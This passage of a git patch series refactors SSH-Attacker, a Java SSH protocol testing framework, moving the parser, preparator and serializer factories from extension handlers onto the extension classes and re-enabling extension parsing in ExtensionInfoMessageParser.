prepareDataContainer(DataContainer dataContainer, LayerContext co } catch (PreparationException ex) { LOGGER.error( "Could not prepare message " - + dataContainer.toString() + + dataContainer + ". Therefore, we skip it: ", ex); return false; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index 4a44ff74d..52b8df4b4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -77,21 +77,13 @@ public LayerProcessingResult sendConfiguration() throws IOException { if (containerAlreadyUsedByHigherLayer(packet) /*|| skipEmptyRecords(session)*/) { continue; } + // AbstractPacket packet = messageLayer.serialize(message); + Preparator preparator = packet.getPreparator(context); + preparator.prepare(); + Serializer serializer = packet.getSerializer(context); + byte[] serializedMessage = serializer.serialize(); - try { - // AbstractPacket packet = messageLayer.serialize(message); - Preparator preparator = packet.getPreparator(context); - preparator.prepare(); - Serializer serializer = packet.getSerializer(context); - byte[] serializedMessage = serializer.serialize(); - - LayerProcessingResult layerProcessingResult = - getLowerLayer().sendData(serializedMessage); - - } catch (IOException e) { - LOGGER.warn("Error while sending packet: " + e.getMessage()); - // return new LayerProcessingResult(); - } + getLowerLayer().sendData(serializedMessage); } } return getLayerResult(); @@ -164,7 +156,7 @@ public void receiveMoreData() throws IOException { context.getReadSequenceNumber()); packet = new BinaryPacket(); } - // BLOB packets do not make a difference between sshv1 and sshv2 + // BLOB packets do not make a difference between sshv1 and sshv2 } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { parser = new BlobPacketParser(dataStream); packet = new BlobPacket(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerInputStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerInputStream.java index 522eb55e0..d38303402 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerInputStream.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerInputStream.java @@ -13,9 +13,7 @@ import java.io.IOException; import java.io.InputStream; -/** - * Inputstream used in layers, Implements additionally the read chunkg and extend feature - */ +/** Inputstream used in layers, Implements additionally the read chunkg and extend feature */ public abstract class LayerInputStream extends InputStream { protected LayerInputStream() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java index c5a0518f7..d56e630de 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java @@ -12,7 +12,6 @@ import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.data.DataContainer; import de.rub.nds.sshattacker.core.layer.data.Handler; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParserSSHv1; import de.rub.nds.sshattacker.core.packet.preparator.BinaryPacketPreparatorSSHv1; @@ -59,8 +58,6 @@ public class BinaryPacketSSHv1 extends AbstractPacket { /** A holder instance for all temporary fields used during crypto computations. */ private PacketCryptoComputations computations; - public BinaryPacketSSHv1() {} - public ModifiableInteger getLength() { return length; } @@ -140,7 +137,7 @@ public void setCrcChecksum(ModifiableByteArray crcChecksum) { } public void setCrcChecksum(byte[] crcChecksum) { - CrcChecksum = ModifiableVariableFactory.safelySetValue(this.CrcChecksum, crcChecksum); + CrcChecksum = ModifiableVariableFactory.safelySetValue(CrcChecksum, crcChecksum); } @Override @@ -157,10 +154,10 @@ public String toString() { } @Override - public boolean equals(Object o) { - if (this == o) return true; - if (o == null || getClass() != o.getClass()) return false; - BinaryPacketSSHv1 that = (BinaryPacketSSHv1) o; + public boolean equals(Object obj) { + if (this == obj) return true; + if (obj == null || getClass() != obj.getClass()) return false; + BinaryPacketSSHv1 that = (BinaryPacketSSHv1) obj; return Objects.equals(length, that.length) && Objects.equals(sequenceNumber, that.sequenceNumber) && Objects.equals(computations, that.computations); From 9256c8f8bd0a07024352a565b127ca85fae08372 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 29 Mar 2024 15:54:03 +0100 Subject: [PATCH 165/176] Migrate Extensions to new layer-stacked principal of parsing, serializing, etc. --- .../sshattacker/core/layer/ProtocolLayer.java | 5 +-- .../handler/ExtensionInfoMessageHandler.java | 29 +++-------------- .../extension/AbstractExtensionHandler.java | 4 ++- .../DelayCompressionExtensionHandler.java | 31 +++++-------------- .../extension/PingExtensionHandler.java | 29 ++++------------- .../ServerSigAlgsExtensionHandler.java | 25 +++------------ .../extension/UnknownExtensionHandler.java | 28 +++-------------- .../message/extension/AbstractExtension.java | 10 ++++++ .../extension/DelayCompressionExtension.java | 19 ++++++++++++ .../message/extension/PingExtension.java | 19 ++++++++++++ .../extension/ServerSigAlgsExtension.java | 19 ++++++++++++ .../message/extension/UnknownExtension.java | 20 ++++++++++++ .../parser/ExtensionInfoMessageParser.java | 31 ++++++++++++------- .../extension/AbstractExtensionParser.java | 28 +++++++++++------ .../DelayCompressionExtensionParser.java | 26 +++++++++++----- .../parser/extension/PingExtensionParser.java | 30 ++++++++++++------ .../ServerSigAlgsExtensionParser.java | 24 +++++++++----- .../extension/UnknownExtensionParser.java | 15 +++++++-- .../ExtensionInfoMessagePreparator.java | 3 +- .../ExtensionInfoMessageSerializer.java | 5 +-- .../DelayCompressionExtensionParserTest.java | 8 +++-- .../ServerSigAlgsExtensionParserTest.java | 7 +++-- 22 files changed, 238 insertions(+), 177 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index ebf1bcaad..e2e42d8ba 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -293,10 +293,7 @@ public boolean prepareDataContainer(DataContainer dataContainer, LayerContext co preparator.afterPrepare(); } catch (PreparationException ex) { LOGGER.error( - "Could not prepare message " - + dataContainer - + ". Therefore, we skip it: ", - ex); + "Could not prepare message " + dataContainer + ". Therefore, we skip it: ", ex); return false; } return true; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ExtensionInfoMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ExtensionInfoMessageHandler.java index 84057b63e..6d91565b2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ExtensionInfoMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ExtensionInfoMessageHandler.java @@ -17,10 +17,6 @@ public ExtensionInfoMessageHandler(SshContext context) { super(context); } - /*public ExtensionInfoMessageHandler(SshContext context, ExtensionInfoMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(ExtensionInfoMessage message) { if (sshContext.isHandleAsClient()) { @@ -29,26 +25,9 @@ public void adjustContext(ExtensionInfoMessage message) { sshContext.setClientSupportedExtensions(message.getExtensions()); } message.getExtensions() - .forEach(extension -> extension.getHandler(sshContext).adjustContext()); - } - - /* @Override - public ExtensionInfoMessageParser getParser(byte[] array) { - return new ExtensionInfoMessageParser(array); - } - - @Override - public ExtensionInfoMessageParser getParser(byte[] array, int startPosition) { - return new ExtensionInfoMessageParser(array, startPosition); + .forEach( + extension -> { + extension.getHandler(sshContext).adjustContext(extension); + }); } - - @Override - public ExtensionInfoMessagePreparator getPreparator() { - return new ExtensionInfoMessagePreparator(context.getChooser(), message); - } - - @Override - public ExtensionInfoMessageSerializer getSerializer() { - return new ExtensionInfoMessageSerializer(message); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/AbstractExtensionHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/AbstractExtensionHandler.java index 784ace46a..51bc4ab6e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/AbstractExtensionHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/AbstractExtensionHandler.java @@ -8,7 +8,7 @@ package de.rub.nds.sshattacker.core.protocol.transport.handler.extension; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.protocol.common.Handler; +import de.rub.nds.sshattacker.core.layer.data.Handler; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.AbstractExtension; public abstract class AbstractExtensionHandler> @@ -27,4 +27,6 @@ protected AbstractExtensionHandler(SshContext context, E extension) { this.context = context; this.extension = extension; } + + public abstract void adjustContext(AbstractExtension extension); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/DelayCompressionExtensionHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/DelayCompressionExtensionHandler.java index 28af516dc..20aef1f77 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/DelayCompressionExtensionHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/DelayCompressionExtensionHandler.java @@ -9,10 +9,8 @@ import de.rub.nds.sshattacker.core.constants.CompressionMethod; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.message.extension.AbstractExtension; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.DelayCompressionExtension; -import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.DelayCompressionExtensionParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.extension.DelayCompressionExtensionPreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.DelayCompressionExtensionSerializer; import de.rub.nds.sshattacker.core.protocol.util.AlgorithmPicker; import de.rub.nds.sshattacker.core.util.Converter; import java.util.List; @@ -35,7 +33,12 @@ public DelayCompressionExtensionHandler( } @Override - public void adjustContext() { + public void adjustContext(AbstractExtension extension) { + adjustContext((DelayCompressionExtension) extension); + } + + @Override + public void adjustContext(DelayCompressionExtension extension) { if (context.isHandleAsClient()) { context.setServerSupportedDelayCompressionMethods( Converter.nameListToEnumValues( @@ -62,26 +65,6 @@ public void adjustContext() { context.setDelayCompressionExtensionReceived(true); } - @Override - public DelayCompressionExtensionParser getParser(byte[] array) { - return new DelayCompressionExtensionParser(array); - } - - @Override - public DelayCompressionExtensionParser getParser(byte[] array, int startPosition) { - return new DelayCompressionExtensionParser(array, startPosition); - } - - @Override - public DelayCompressionExtensionPreparator getPreparator() { - return new DelayCompressionExtensionPreparator(context.getChooser(), extension); - } - - @Override - public DelayCompressionExtensionSerializer getSerializer() { - return new DelayCompressionExtensionSerializer(extension); - } - private CompressionMethod getCommonCompressionMethod( List clientSupportedCompressionMethods, List serverSupportedCompressionMethods) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/PingExtensionHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/PingExtensionHandler.java index 4cb68573c..e7fa4b273 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/PingExtensionHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/PingExtensionHandler.java @@ -8,10 +8,8 @@ package de.rub.nds.sshattacker.core.protocol.transport.handler.extension; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.message.extension.AbstractExtension; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.PingExtension; -import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.PingExtensionParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.extension.PingExtensionPreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.PingExtensionSerializer; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -28,28 +26,13 @@ public PingExtensionHandler(SshContext context, PingExtension extension) { } @Override - public void adjustContext() { - LOGGER.info( - "Remote peer signaled support for ping@openssh.com extension via SSH_MSG_EXT_INFO"); + public void adjustContext(AbstractExtension extension) { + adjustContext((PingExtension) extension); } @Override - public PingExtensionParser getParser(byte[] array) { - return new PingExtensionParser(array); - } - - @Override - public PingExtensionParser getParser(byte[] array, int startPosition) { - return new PingExtensionParser(array, startPosition); - } - - @Override - public PingExtensionPreparator getPreparator() { - return new PingExtensionPreparator(context.getChooser(), extension); - } - - @Override - public PingExtensionSerializer getSerializer() { - return new PingExtensionSerializer(extension); + public void adjustContext(PingExtension extension) { + LOGGER.info( + "Remote peer signaled support for ping@openssh.com extension via SSH_MSG_EXT_INFO"); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/ServerSigAlgsExtensionHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/ServerSigAlgsExtensionHandler.java index 8bcb31aa1..5b0a2e922 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/ServerSigAlgsExtensionHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/ServerSigAlgsExtensionHandler.java @@ -9,10 +9,8 @@ import de.rub.nds.sshattacker.core.constants.PublicKeyAlgorithm; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.message.extension.AbstractExtension; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.ServerSigAlgsExtension; -import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.ServerSigAlgsExtensionParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.extension.ServerSigAlgsExtensionPreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.ServerSigAlgsExtensionSerializer; import de.rub.nds.sshattacker.core.util.Converter; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -31,27 +29,12 @@ public ServerSigAlgsExtensionHandler(SshContext context, ServerSigAlgsExtension } @Override - public ServerSigAlgsExtensionParser getParser(byte[] array) { - return new ServerSigAlgsExtensionParser(array); + public void adjustContext(AbstractExtension extension) { + adjustContext((ServerSigAlgsExtension) extension); } @Override - public ServerSigAlgsExtensionParser getParser(byte[] array, int startPosition) { - return new ServerSigAlgsExtensionParser(array, startPosition); - } - - @Override - public ServerSigAlgsExtensionPreparator getPreparator() { - return new ServerSigAlgsExtensionPreparator(context.getChooser(), extension); - } - - @Override - public ServerSigAlgsExtensionSerializer getSerializer() { - return new ServerSigAlgsExtensionSerializer(extension); - } - - @Override - public void adjustContext() { + public void adjustContext(ServerSigAlgsExtension extension) { // receiving "server-sig-algs" extension as a client -> context has to be updated if (context.isHandleAsClient()) { context.setServerSigAlgsExtensionReceivedFromServer(true); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/UnknownExtensionHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/UnknownExtensionHandler.java index b2e311033..d26038371 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/UnknownExtensionHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/UnknownExtensionHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler.extension; -import de.rub.nds.sshattacker.core.exceptions.NotImplementedException; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.protocol.common.Preparator; +import de.rub.nds.sshattacker.core.protocol.transport.message.extension.AbstractExtension; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.UnknownExtension; -import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.UnknownExtensionParser; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.UnknownExtensionSerializer; public class UnknownExtensionHandler extends AbstractExtensionHandler { @@ -25,27 +22,12 @@ public UnknownExtensionHandler(SshContext context, UnknownExtension extension) { } @Override - public void adjustContext() { - // TODO: Handle UnknownExtension - } - - @Override - public UnknownExtensionParser getParser(byte[] array) { - return new UnknownExtensionParser(array); + public void adjustContext(AbstractExtension extension) { + adjustContext((UnknownExtension) extension); } @Override - public UnknownExtensionParser getParser(byte[] array, int startPosition) { - return new UnknownExtensionParser(array, startPosition); - } - - @Override - public Preparator getPreparator() { - throw new NotImplementedException("UnknownExtensionHandler::getPreparator"); - } - - @Override - public UnknownExtensionSerializer getSerializer() { - return new UnknownExtensionSerializer(extension); + public void adjustContext(UnknownExtension extension) { + // TODO: Handle UnknownExtension } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/AbstractExtension.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/AbstractExtension.java index 8083410b4..a6034b630 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/AbstractExtension.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/AbstractExtension.java @@ -13,6 +13,10 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; import de.rub.nds.sshattacker.core.protocol.transport.handler.extension.AbstractExtensionHandler; +import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.AbstractExtensionParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.extension.AbstractExtensionPreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.AbstractExtensionSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public abstract class AbstractExtension> @@ -61,4 +65,10 @@ public void setName(String name, boolean adjustLengthField) { } public abstract AbstractExtensionHandler getHandler(SshContext context); + + public abstract AbstractExtensionPreparator getPreparator(SshContext sshContext); + + public abstract AbstractExtensionSerializer getSerializer(SshContext sshContext); + + public abstract AbstractExtensionParser getParser(SshContext context, InputStream stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/DelayCompressionExtension.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/DelayCompressionExtension.java index b64e28d2d..cf977917e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/DelayCompressionExtension.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/DelayCompressionExtension.java @@ -15,6 +15,10 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.handler.extension.DelayCompressionExtensionHandler; +import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.DelayCompressionExtensionParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.extension.DelayCompressionExtensionPreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.DelayCompressionExtensionSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import java.util.List; import java.util.stream.Collectors; @@ -221,4 +225,19 @@ private int computeCompressionMethodsLength() { public DelayCompressionExtensionHandler getHandler(SshContext context) { return new DelayCompressionExtensionHandler(context, this); } + + @Override + public DelayCompressionExtensionParser getParser(SshContext context, InputStream stream) { + return new DelayCompressionExtensionParser(stream); + } + + @Override + public DelayCompressionExtensionPreparator getPreparator(SshContext sshContext) { + return new DelayCompressionExtensionPreparator(sshContext.getChooser(), this); + } + + @Override + public DelayCompressionExtensionSerializer getSerializer(SshContext sshContext) { + return new DelayCompressionExtensionSerializer(this); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/PingExtension.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/PingExtension.java index 1608789de..d0afa4452 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/PingExtension.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/PingExtension.java @@ -12,6 +12,10 @@ import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.handler.extension.PingExtensionHandler; +import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.PingExtensionParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.extension.PingExtensionPreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.PingExtensionSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class PingExtension extends AbstractExtension { @@ -62,4 +66,19 @@ public void setVersion(String version, boolean adjustLengthField) { public PingExtensionHandler getHandler(SshContext context) { return new PingExtensionHandler(context, this); } + + @Override + public PingExtensionParser getParser(SshContext context, InputStream stream) { + return new PingExtensionParser(stream); + } + + @Override + public PingExtensionPreparator getPreparator(SshContext sshContext) { + return new PingExtensionPreparator(sshContext.getChooser(), this); + } + + @Override + public PingExtensionSerializer getSerializer(SshContext context) { + return new PingExtensionSerializer(this); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/ServerSigAlgsExtension.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/ServerSigAlgsExtension.java index 15c9c5193..9427a6ca6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/ServerSigAlgsExtension.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/ServerSigAlgsExtension.java @@ -14,6 +14,10 @@ import de.rub.nds.sshattacker.core.constants.PublicKeyAlgorithm; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.handler.extension.ServerSigAlgsExtensionHandler; +import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.ServerSigAlgsExtensionParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.extension.ServerSigAlgsExtensionPreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.ServerSigAlgsExtensionSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import java.util.List; import java.util.stream.Collectors; @@ -107,4 +111,19 @@ public void setAcceptedPublicKeyAlgorithms( public ServerSigAlgsExtensionHandler getHandler(SshContext context) { return new ServerSigAlgsExtensionHandler(context, this); } + + @Override + public ServerSigAlgsExtensionParser getParser(SshContext context, InputStream stream) { + return new ServerSigAlgsExtensionParser(stream); + } + + @Override + public ServerSigAlgsExtensionPreparator getPreparator(SshContext sshContext) { + return new ServerSigAlgsExtensionPreparator(sshContext.getChooser(), this); + } + + @Override + public ServerSigAlgsExtensionSerializer getSerializer(SshContext sshContext) { + return new ServerSigAlgsExtensionSerializer(this); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/UnknownExtension.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/UnknownExtension.java index 0ce54e840..bd560de19 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/UnknownExtension.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/UnknownExtension.java @@ -10,8 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.exceptions.NotImplementedException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.handler.extension.UnknownExtensionHandler; +import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.UnknownExtensionParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.extension.AbstractExtensionPreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.UnknownExtensionSerializer; +import java.io.InputStream; public class UnknownExtension extends AbstractExtension { @@ -61,4 +66,19 @@ public void setValue(byte[] value, boolean adjustLengthField) { public UnknownExtensionHandler getHandler(SshContext context) { return new UnknownExtensionHandler(context, this); } + + @Override + public AbstractExtensionPreparator getPreparator(SshContext sshContext) { + throw new NotImplementedException("UnknownExtensionHandler::getPreparator"); + } + + @Override + public UnknownExtensionParser getParser(SshContext context, InputStream stream) { + return new UnknownExtensionParser(stream); + } + + @Override + public UnknownExtensionSerializer getSerializer(SshContext sshContext) { + return new UnknownExtensionSerializer(this); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java index f331e097c..e8a9d85f7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java @@ -8,9 +8,14 @@ package de.rub.nds.sshattacker.core.protocol.transport.parser; import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.constants.Extension; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.ExtensionInfoMessage; +import de.rub.nds.sshattacker.core.protocol.transport.message.extension.*; +import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.*; import java.io.InputStream; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -42,39 +47,43 @@ private void parseExtensionCount(ExtensionInfoMessage message) { } private void parseExtensions(ExtensionInfoMessage message) { + // Commenting just for debugging - /*for (int extensionIndex = 0, extensionStartPointer = getPointer(); + for (int extensionIndex = 0; extensionIndex < message.getExtensionCount().getValue(); - extensionIndex++, extensionStartPointer = getPointer()) { + extensionIndex++) { // Parse extension name to determine the parser to use int extensionNameLength = parseIntField(DataFormatConstants.UINT32_SIZE); Extension extension = Extension.fromName( parseByteString(extensionNameLength, StandardCharsets.US_ASCII)); + AbstractExtension abstractExtension; AbstractExtensionParser extensionParser; switch (extension) { case SERVER_SIG_ALGS: - extensionParser = - new ServerSigAlgsExtensionParser(getArray(), extensionStartPointer); + ServerSigAlgsExtension serverSigAlgsExtension = new ServerSigAlgsExtension(); + serverSigAlgsExtension.getParser(new SshContext(), getStream()); + message.addExtension(serverSigAlgsExtension); break; case DELAY_COMPRESSION: - extensionParser = - new DelayCompressionExtensionParser(getArray(), extensionStartPointer); + DelayCompressionExtension delayCompressionExtension = + new DelayCompressionExtension(); + delayCompressionExtension.getParser(new SshContext(), getStream()); break; case PING_OPENSSH_COM: - extensionParser = new PingExtensionParser(getArray(), extensionStartPointer); + PingExtension pingExtension = new PingExtension(); + pingExtension.getParser(new SshContext(), getStream()); break; default: LOGGER.debug( "Extension [{}] (index {}) is unknown or not implemented, parsing as UnknownExtension", extension, extensionIndex); - extensionParser = new UnknownExtensionParser(getArray(), extensionStartPointer); + UnknownExtension unknownExtension = new UnknownExtension(); + unknownExtension.getParser(new SshContext(), getStream()); break; } - message.addExtension(extensionParser.parse()); - setPointer(extensionParser.getPointer()); - }*/ + } } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/AbstractExtensionParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/AbstractExtensionParser.java index abfb62976..2ef34236d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/AbstractExtensionParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/AbstractExtensionParser.java @@ -8,8 +8,9 @@ package de.rub.nds.sshattacker.core.protocol.transport.parser.extension; import de.rub.nds.sshattacker.core.constants.DataFormatConstants; -import de.rub.nds.sshattacker.core.protocol.common.Parser; +import de.rub.nds.sshattacker.core.layer.data.Parser; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.AbstractExtension; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -20,30 +21,39 @@ public abstract class AbstractExtensionParser> ex protected final E extension = createExtension(); - protected AbstractExtensionParser(byte[] array) { + protected AbstractExtensionParser(InputStream stream) { + super(stream); + } + + /* protected AbstractExtensionParser(byte[] array) { super(array); } protected AbstractExtensionParser(byte[] array, int startPosition) { super(array, startPosition); - } + }*/ protected abstract E createExtension(); - @Override + protected void parseExtensionData(E abstractExtension) { + parseExtensionName(abstractExtension); + parseExtensionValue(abstractExtension); + } + + /* @Override public final E parse() { parseExtensionName(); parseExtensionValue(); return extension; - } + }*/ - protected void parseExtensionName() { - extension.setNameLength(parseIntField(DataFormatConstants.UINT32_SIZE)); + protected void parseExtensionName(E abstractExtension) { + abstractExtension.setNameLength(parseIntField(DataFormatConstants.UINT32_SIZE)); 